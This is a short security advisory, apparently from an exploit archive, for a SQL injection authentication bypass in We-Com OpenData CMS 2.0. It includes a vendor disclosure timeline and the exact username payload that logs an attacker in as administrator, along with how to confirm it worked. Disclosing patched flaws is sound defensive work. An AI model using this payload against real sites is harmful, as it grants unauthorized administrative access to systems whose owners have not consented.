We-Com OpenData CMS 2.0 SQL Injection

We-Com OpenData CMS version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

MD5 | ec40e47ff0cb9b4ba525a2dff42ae8cd

# Exploit Title: We-com OpenData CMS 2.0 Authentication Bypass / SQL Injection
# Google Dork:N/A
# Date: 2020-04-17
# Exploit Author: @ThelastVvV
# Vendor Homepage: https://www.we-com.it/
# Version: 2.0
# Tested on: 5.5.0-kali1-amd64


Vendor contact timeline:

2020-05-05: Contacting vendor through [email protected]
2020-05-26: A Patch is published in the version
2020-06-01: Release of security advisory

Authentication Bypass / SQL Injection in the opendata 2.0 CMS


USERNAME: admin' or '1' = '1'; -- -


the SQL injection attack has resulted in a bypass of the login,to confirm you will get a reponse in header of the page with "okokokokokokokokokokokokokok"

But will not redirect you to the control panel so you wil need to do it manual


and we are now authenticated as "adminstrator".

Related Posts